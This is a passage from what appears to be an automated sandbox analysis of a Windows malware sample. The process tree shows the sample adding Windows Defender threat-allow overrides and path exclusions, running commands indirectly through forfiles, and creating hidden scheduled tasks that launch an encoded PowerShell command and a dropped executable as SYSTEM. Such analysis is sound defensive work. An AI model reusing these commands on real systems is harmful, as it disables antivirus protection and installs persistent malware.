C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
PID:4872 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:1584
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:4732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1120
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:220
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1420
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2600
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3116 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4924
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1128 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3280 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3580
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4332
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:680
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1064 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:376
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1440 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1448 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1416 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1476 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2364
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1780 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1988
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2752
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4812 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3008
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3852 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3892
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3348
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3492
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3180
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4312
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FDxSmxakU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FDxSmxakU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QSBDBQxFkAUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QSBDBQxFkAUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TjUkTRKCSiJkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TjUkTRKCSiJkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tEZYwqVfuQYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tEZYwqVfuQYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\IrAQtycGxHJKWAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\IrAQtycGxHJKWAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BhywXhhbcuWpvQvH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BhywXhhbcuWpvQvH\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:323⤵PID:2168
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:860 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:643⤵PID:1700
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR" /t REG_DWORD /d 0 /reg:323⤵PID:4100
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR" /t REG_DWORD /d 0 /reg:643⤵PID:3216
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QSBDBQxFkAUn" /t REG_DWORD /d 0 /reg:323⤵PID:3452
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QSBDBQxFkAUn" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:216 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TjUkTRKCSiJkC" /t REG_DWORD /d 0 /reg:323⤵PID:2052
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TjUkTRKCSiJkC" /t REG_DWORD /d 0 /reg:643⤵PID:3644
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEZYwqVfuQYU2" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:356 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEZYwqVfuQYU2" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4104 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\IrAQtycGxHJKWAVB /t REG_DWORD /d 0 /reg:323⤵PID:4440
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\IrAQtycGxHJKWAVB /t REG_DWORD /d 0 /reg:643⤵PID:3924
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1588 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4664 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY /t REG_DWORD /d 0 /reg:323⤵PID:3444
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4220 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BhywXhhbcuWpvQvH /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2888 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BhywXhhbcuWpvQvH /t REG_DWORD /d 0 /reg:643⤵PID:4316
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHoIuxlqL" /SC once /ST 04:25:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4920 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHoIuxlqL"2⤵PID:3196
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHoIuxlqL"2⤵PID:4936
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hzhNAJUNSjjdIpELG" /SC once /ST 03:08:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\DhIGibW.exe\" AX /TcNOdidhp 385104 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2348 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hzhNAJUNSjjdIpELG"2⤵
- System Location Discovery: System Language Discovery
PID:4540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 9442⤵
- Program crash
PID:2060
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3212 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4012
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:2808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5056
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4032
-
C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\DhIGibW.exeC:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\DhIGibW.exe AX /TcNOdidhp 385104 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4900 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:400
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:1060 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:2632 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1084
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2512 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:1348 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1408
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:1636 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:4992
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2004
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3364 -
